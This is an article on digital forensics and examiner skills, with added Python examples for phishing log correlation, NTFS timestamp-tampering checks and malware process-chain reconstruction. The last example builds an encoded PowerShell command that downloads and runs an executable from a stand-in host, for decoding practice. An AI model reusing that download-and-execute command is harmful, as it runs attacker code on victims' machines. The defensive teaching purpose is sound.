Cybercrimes cover a broad spectrum, from email scams to downloading copyrighted works for redistribution, and are commonly fueled by a desire to profit from another person's intellectual property or private information.
Computer forensics, or digital forensics, is a fairly new field: the art and science of applying computer science to aid the legal process. The goal of computer forensics is to perform a structured investigation while maintaining a documented chain of custody for the evidence, in order to find out exactly what happened on a computing device and who was responsible for it.
Forensic investigators typically follow a standard set of procedures. Computer forensics requires specialized expertise and tools that go beyond the usual methods of collecting and storing data available to end users or technical support personnel. It involves techniques and principles similar to those of data recovery, but with additional guidelines and practices designed to create a legal audit trail.
Computer forensics will play a greater role in exposing the malicious acts of people. As it continues to advance, it will make it more difficult for people to hide their wrongful acts and easier to have them held responsible.
Alfred Demirjian
The issues facing computer forensics examiners can be broken down into three broad categories: technical, legal and administrative.
- Technical issues
  - Encryption
  - Increasing storage space
  - New technologies
  - Anti-forensics
Forensics is critically important to the incident response process and is useful both for routine investigations and for time-critical response. For example, when a company is dealing with a successful phishing attack, forensic processes can be used to establish facts such as who clicked on the link, who was successfully phished and compromised, and what information was actually accessed or taken.
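Here is how those three questions look when answered from logs, as an added example that is not part of the original article. The mail-gateway, proxy and logon records below are constructed, their key=value layout is invented for the example, and treating a POST back to the lure host as a credential submission is an assumption to confirm against the actual phishing page:

```python
"""Answer the three phishing questions (who received the lure, who clicked, whose
account was then used) by correlating mail-gateway, web-proxy and logon logs.
Added example; every log line below is constructed, not taken from a real incident."""
import re
from datetime import datetime, timedelta

MAIL_LOG = """\
2024-05-06T08:02:11Z msgid=<a1@mail.example> to=alice@corp.example subject="Invoice overdue" url=http://corp-invoice-portal.example/login
2024-05-06T08:02:12Z msgid=<a1@mail.example> to=bob@corp.example subject="Invoice overdue" url=http://corp-invoice-portal.example/login
2024-05-06T08:02:12Z msgid=<a1@mail.example> to=carol@corp.example subject="Invoice overdue" url=http://corp-invoice-portal.example/login
2024-05-06T08:15:40Z msgid=<b7@news.example> to=dave@corp.example subject="Weekly digest" url=https://news.example/digest
"""
PROXY_LOG = """\
2024-05-06T08:05:02Z user=alice src=10.1.1.20 GET http://corp-invoice-portal.example/login 200
2024-05-06T08:05:09Z user=alice src=10.1.1.20 POST http://corp-invoice-portal.example/login 302
2024-05-06T08:07:30Z user=bob src=10.1.1.31 GET http://corp-invoice-portal.example/login 200
2024-05-06T08:20:00Z user=dave src=10.1.1.44 GET https://news.example/digest 200
"""
AUTH_LOG = """\
2024-05-06T07:58:00Z user=alice src=10.1.1.20 result=success
2024-05-06T08:31:17Z user=alice src=203.0.113.77 result=success
2024-05-06T08:31:50Z user=bob src=198.51.100.9 result=failure
2024-05-06T09:10:00Z user=carol src=10.1.1.52 result=success
"""
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
REQ_RE = re.compile(r"\b(GET|POST) (\S+) (\d{3})$")

def parse_log(text):
    """Turn one constructed log into a list of dicts with a parsed UTC timestamp."""
    events = []
    for line in text.splitlines():
        ts, rest = line.split(" ", 1)
        ev = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        ev["ts"] = datetime.strptime(ts, TS_FMT)
        m = REQ_RE.search(rest)  # proxy lines end with "METHOD url status"
        if m:
            ev["method"], ev["url"], ev["status"] = m.group(1), m.group(2), int(m.group(3))
        events.append(ev)
    return events

def host_of(url):
    return re.sub(r"^\w+://", "", url).split("/")[0].lower()

def phishing_triage(mail, proxy, auth, lure_host, window=timedelta(hours=24)):
    # 1. who received the lure (keyed on the local part of the recipient address)
    delivered = {e["to"].split("@")[0]: e["ts"] for e in mail if host_of(e["url"]) == lure_host}
    # 2. who clicked: a request to the lure host by a recipient after delivery;
    #    a POST back to the lure host is treated as a credential submission (assumption)
    clicked, submitted = {}, set()
    for e in proxy:
        u = e["user"]
        if u in delivered and host_of(e["url"]) == lure_host and e["ts"] >= delivered[u]:
            clicked.setdefault(u, e["ts"])
            if e["method"] == "POST":
                submitted.add(u)
    # 3. whose account was used: a successful logon inside the window after the click,
    #    from a source address that account had never used before the click
    misuse = []
    for u, t0 in clicked.items():
        known = {e["src"] for e in auth if e["user"] == u and e["ts"] < t0}
        for e in auth:
            if (e["user"] == u and e["result"] == "success"
                    and t0 <= e["ts"] <= t0 + window and e["src"] not in known):
                misuse.append((u, e["src"], e["ts"]))
    return {"delivered": sorted(delivered), "clicked": sorted(clicked),
            "submitted": sorted(submitted), "account_misuse": misuse}

def run_demo():
    return phishing_triage(parse_log(MAIL_LOG), parse_log(PROXY_LOG), parse_log(AUTH_LOG),
                           lure_host="corp-invoice-portal.example")

if __name__ == "__main__":
    for k, v in run_demo().items():
        print("%-15s %s" % (k, v))
```

The correlation keys on the username, so proxy and logon logs must carry the same identifier as the mail log. These sources also only show what passed through those control points: a click from a phone on a mobile network leaves no proxy entry, so an empty result scopes the incident but does not close it.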
Computer forensics has become its own area of scientific expertise, with accompanying coursework and certification.
What knowledge and skills should a digital examiner have?
Mobile forensics
There are a great many mobile devices around. Luckily for digital examiners, the war between developers of mobile operating systems has ended: nearly all mobile devices now run iOS or Android. Knowledge of the forensic artifacts of just two mobile operating systems therefore allows a digital examiner to explore a vast number of devices. Mobile devices store a lot of private data about their owners, which can be used to investigate crimes. Some mobile devices also remain vulnerable to malware despite the vendors' countermeasures, which can lead to theft of that private data. There are several good tools for extracting and analyzing data from mobile devices, but manual analysis will reveal more forensic artifacts on the analyzed device than the tools alone.
Cloud Forensics
The cloud concept is very convenient for users. You can access your private information or working documents from anywhere in the world, without worrying that the hard drive in a laptop or desktop may fail or that priceless family photos will become inaccessible in a broken smartphone. Many cloud services let users copy all of their information and files to a local PC or laptop for free. Exploring the artifacts of cloud services on the owner's devices lets you establish which files were uploaded to or downloaded from a cloud, along with other information about the use of cloud services and the data kept in them.
Drone Forensics
Drones are used in everyday life more and more. Investigating information extracted from drones will soon become routine work for digital examiners. We already see encryption being used to protect data in the memory of drones, and cloud services being used to store the information a drone needs to function.
Windows Forensics
The vast majority of PCs and laptops run Windows, and company servers frequently run Windows as well. Researchers constantly report the discovery of new artifacts that can be used in forensic analysis. Knowledge of Windows Forensics is therefore fundamental for any digital examiner.
Mac Forensics
Of course, the number of Mac owners varies from country to country, but the general trend is that the number of Macs arriving in digital forensic laboratories is increasing. Knowledge of Mac Forensics will allow a digital examiner to explore these devices successfully.
File Systems Forensics
An examiner encounters only a handful of basic file systems: EXT, FAT, NTFS and HFS+. Knowledge of which artifacts remain in these file systems is needed in Windows Forensics, Incident Response, Data Recovery and Mobile Forensics.
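To make the idea of a file system artifact concrete, here is an added example (not from the original article) that parses an NTFS MFT record, applies the update-sequence fixups, and compares the $STANDARD_INFORMATION timestamps with the $FILE_NAME timestamps, a standard check for the timestamp tampering mentioned under anti-forensics above. The 1024-byte record is constructed inside the script with made-up times and the file name report.docx; only the NTFS structure offsets are real.

```python
"""Parse an NTFS MFT FILE record and compare $STANDARD_INFORMATION ($SI) timestamps with
$FILE_NAME ($FN) timestamps. Added example; the record is constructed below, not from an image."""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
ATTR_SI, ATTR_FN, ATTR_END = 0x10, 0x30, 0xFFFFFFFF
TIME_KEYS = ("created", "modified", "mft_modified", "accessed")

def filetime_to_dt(ft):  # FILETIME = 100 ns ticks since 1601-01-01 UTC
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def dt_to_filetime(dt):  # timedelta // timedelta is exact; float seconds would lose ticks
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10

def apply_fixups(rec):
    """NTFS stamps the USN into the last 2 bytes of every 512-byte sector; restore the originals."""
    usa_off, usa_cnt = struct.unpack_from("<HH", rec, 0x04)
    usn, out = rec[usa_off:usa_off + 2], bytearray(rec)
    for i in range(1, usa_cnt):
        pos = i * 512 - 2
        if out[pos:pos + 2] != usn:
            raise ValueError("fixup mismatch at offset %#x: torn or corrupt record" % pos)
        out[pos:pos + 2] = rec[usa_off + 2 * i:usa_off + 2 * i + 2]
    return bytes(out)

def parse_mft_record(rec):
    """Return header flags, the file name and the raw FILETIME values of $SI and $FN."""
    if rec[:4] != b"FILE":
        raise ValueError("not an MFT FILE record")
    rec = apply_fixups(rec)
    first_attr, flags = struct.unpack_from("<HH", rec, 0x14)
    info = {"in_use": bool(flags & 0x01), "is_dir": bool(flags & 0x02),
            "record_no": struct.unpack_from("<I", rec, 0x2C)[0]}
    off = first_attr
    while struct.unpack_from("<I", rec, off)[0] != ATTR_END:
        atype, alen, nonresident = struct.unpack_from("<IIB", rec, off)
        if alen == 0:
            raise ValueError("zero-length attribute at offset %#x" % off)
        if not nonresident:  # $SI and $FN are always resident
            vlen, voff = struct.unpack_from("<IH", rec, off + 0x10)
            val = rec[off + voff:off + voff + vlen]
            if atype == ATTR_SI:
                info["si"] = dict(zip(TIME_KEYS, struct.unpack_from("<4Q", val, 0x00)))
            elif atype == ATTR_FN:
                info["fn"] = dict(zip(TIME_KEYS, struct.unpack_from("<4Q", val, 0x08)))
                info["name"] = val[0x42:0x42 + 2 * val[0x40]].decode("utf-16-le")
        off += alen
    return info

def timestomp_indicators(info):
    """Heuristics, not proof: user-mode tools rewrite $SI but normally leave $FN alone."""
    si, fn, hits = info["si"], info["fn"], []
    for k in ("created", "modified"):
        if si[k] < fn[k]:
            hits.append("$SI %s predates $FN %s" % (k, k))
    for k, ft in si.items():
        if ft % 10_000_000 == 0:  # exactly on a second boundary: the fraction was zeroed
            hits.append("$SI %s has zero sub-second part" % k)
    return hits

def build_test_record(si_times, fn_times, name, record_no=40):
    """Constructed 1024-byte record: header, USA, resident $SI, resident $FN, end marker."""
    def resident_attr(atype, value):
        total = 0x18 + len(value)
        total += (-total) % 8  # attribute lengths are 8-byte aligned
        hdr = struct.pack("<IIBBHHHIHBB", atype, total, 0, 0, 0x18, 0, 0, len(value), 0x18, 0, 0)
        return hdr + value.ljust(total - 0x18, b"\0")
    si = struct.pack("<4Q", *[dt_to_filetime(t) for t in si_times])
    si += struct.pack("<4I", 0x20, 0, 0, 0)  # DOS flags (ARCHIVE), max version, version, class id
    fn = struct.pack("<Q", 5 | (5 << 48))  # parent = root directory (MFT entry 5)
    fn += struct.pack("<4Q", *[dt_to_filetime(t) for t in fn_times])
    fn += struct.pack("<QQII", 4096, 3201, 0x20, 0)  # allocated size, real size, flags, reparse
    fn += struct.pack("<BB", len(name), 1) + name.encode("utf-16-le")  # namespace 1 = Win32
    body = resident_attr(ATTR_SI, si) + resident_attr(ATTR_FN, fn) + struct.pack("<II", ATTR_END, 0)
    first_attr = 0x38  # 48-byte header + 6-byte USA, rounded up to 8
    used = first_attr + len(body)
    hdr = struct.pack("<4sHHQHHHHIIQHHI", b"FILE", 0x30, 3, 0, 1, 1, first_attr, 0x01,
                      used, 1024, 0, 3, 0, record_no)
    rec = bytearray(1024)
    rec[:len(hdr)], rec[first_attr:used] = hdr, body
    rec[0x30:0x32] = usn = b"\x07\x00"
    for i in (1, 2):  # park the sector-end bytes in the USA and stamp the USN in their place
        pos = i * 512 - 2
        rec[0x30 + 2 * i:0x32 + 2 * i], rec[pos:pos + 2] = rec[pos:pos + 2], usn
    return bytes(rec)

UTC = timezone.utc
REAL_CREATED = datetime(2023, 3, 10, 9, 15, 30, 500000, tzinfo=UTC)
REAL_MODIFIED = datetime(2023, 3, 10, 9, 20, 1, 250000, tzinfo=UTC)
STOMPED_AT = datetime(2023, 3, 10, 9, 30, 0, 125000, tzinfo=UTC)
BACKDATED = datetime(2019, 1, 1, tzinfo=UTC)  # the value the attacker wrote into $SI

def demo_record():  # $FN keeps the true times; $SI C/M/A backdated, entry-modified = tampering time
    return build_test_record((BACKDATED, BACKDATED, STOMPED_AT, BACKDATED),
                             (REAL_CREATED, REAL_MODIFIED, REAL_MODIFIED, REAL_MODIFIED), "report.docx")

if __name__ == "__main__":
    print("\n".join(timestomp_indicators(parse_mft_record(demo_record()))) or "no indicators")
```

The indicators are heuristics. Copy tools that preserve timestamps (robocopy with timestamp copying, archive extraction) legitimately leave $SI older than $FN, and files that came from FAT media carry 2-second granularity, so a hit is a reason to pull $LogFile and $UsnJrnl for the same entry, not a conclusion.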
Incident Response
There are a lot of tools on the internet for hackers and penetration testers, and they automate the routine work of attackers. As a result, the number of incidents involving the theft of money and of private or financial information is constantly increasing, and the demand for digital examiners with Incident Response skills is growing with it.
Memory Forensics
This is a specific area of knowledge that a digital examiner will not use every day. However, knowledge of Memory Forensics allows significantly faster Incident Response, detection of malware, and recovery of the keys needed to decrypt drives and partitions. The examiner can also retrieve other data and files that are held only in the RAM of the device under examination.
Network Forensics
Network Forensics allows detection of anomalies in the operation of computer networks and detection of an intruder. It is also used in the dynamic analysis of malware.
Cyber Threat Intelligence
Hackers and pentesters can use a huge number of methods to penetrate a targeted computer or network. Knowledge of Cyber Threat Intelligence allows the examiner to narrow this whole variety of methods down to the few most likely ones. This reduces the response time to an incident and helps identify all compromised computers and other devices (for example, routers).
Malware Forensics
Of course, a digital examiner does not have the same skills as a malware analyst. However, a digital examiner's knowledge should suffice to determine which malware was involved in the incident (a compromised system usually contains several samples) and to understand how the attack on the compromised system was carried out. For example, a typical attack on a computer looks like this: an email with a malicious document arrives in the mailbox of the computer's owner. When someone opens the document, it runs a PowerShell script that downloads an executable file (the malware). Understanding how the incident happened and what took place on the compromised computer requires knowledge of Malware Forensics.
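An added example (not from the original article) that reconstructs exactly that chain from process-creation records. The tuples follow the Sysmon Event ID 1 fields (process id, parent id, image, command line), but the records themselves, the document name, the pid values and the download URL are constructed. The point it makes beyond the paragraph is that the -EncodedCommand argument is base64 over UTF-16LE, not plain base64, so a naive decode yields interleaved NUL bytes and misses the URL:

```python
"""Reconstruct the document -> PowerShell -> dropped executable chain from process-creation
records and decode the -EncodedCommand payload. Added example; the records mimic Sysmon
Event ID 1 fields but are constructed here, including the URL and file names."""
import base64
import re

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SHELLS = {"POWERSHELL.EXE", "PWSH.EXE"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the usual ones.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"),;]+")

def encode_ps(script):
    """What the attacker did: UTF-16LE, then base64 (used here only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_ps(b64):
    """The examiner's step: base64, then UTF-16LE, otherwise every other byte is a NUL."""
    return base64.b64decode(b64).decode("utf-16-le")

STAGE2 = ("(New-Object Net.WebClient).DownloadFile('http://payload.example/upd.exe',"
          "\"$env:TEMP\\upd.exe\"); Start-Process \"$env:TEMP\\upd.exe\"")
# constructed records: (pid, ppid, image, command line)
EVENTS = [
    (812, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    (4120, 812, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\Invoice_4471.doc"'),
    (5044, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -W Hidden -Enc " + encode_ps(STAGE2)),
    (5308, 5044, r"C:\Users\jdoe\AppData\Local\Temp\upd.exe",
     r'"C:\Users\jdoe\AppData\Local\Temp\upd.exe"'),
]

def basename(image):
    return image.rsplit("\\", 1)[-1].upper()

def ancestry(events, pid):
    """Follow parent-pid links upwards; the chain is returned root-first."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid])
        pid = by_pid[pid][1]
    return chain[::-1]

def reconstruct(events, leaf_pid):
    """Name the chain, flag an Office app spawning a shell, decode the shell's payload."""
    chain = ancestry(events, leaf_pid)
    names = [basename(e[2]) for e in chain]
    office_to_shell = any(a in OFFICE_APPS and b in SHELLS for a, b in zip(names, names[1:]))
    script, urls = None, []
    for e in chain:
        if basename(e[2]) in SHELLS:
            m = ENC_RE.search(e[3])
            if m:
                script = decode_ps(m.group(1))
                urls = URL_RE.findall(script)
    return {"chain": names, "office_spawned_shell": office_to_shell,
            "script": script, "urls": urls}

if __name__ == "__main__":
    r = reconstruct(EVENTS, 5308)
    print(" -> ".join(r["chain"]))
    print("Office spawned a shell:", r["office_spawned_shell"])
    print("decoded:", r["script"])
    print("download URLs:", r["urls"])
```

The -NoP (no profile) and -W Hidden (hidden window) switches in the constructed command line are the ones these droppers typically add, so they are worth a search of their own across all process-creation records, not just the chain under the suspicious document.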
Conclusion
The article examined basic knowledge and skills that should help a digital examiner to work effectively. Of course, this list is not exhaustive. Developments in the computer industry require a digital examiner to learn new skills and knowledge.
Happy forensicating!
About the authors
Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.
Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.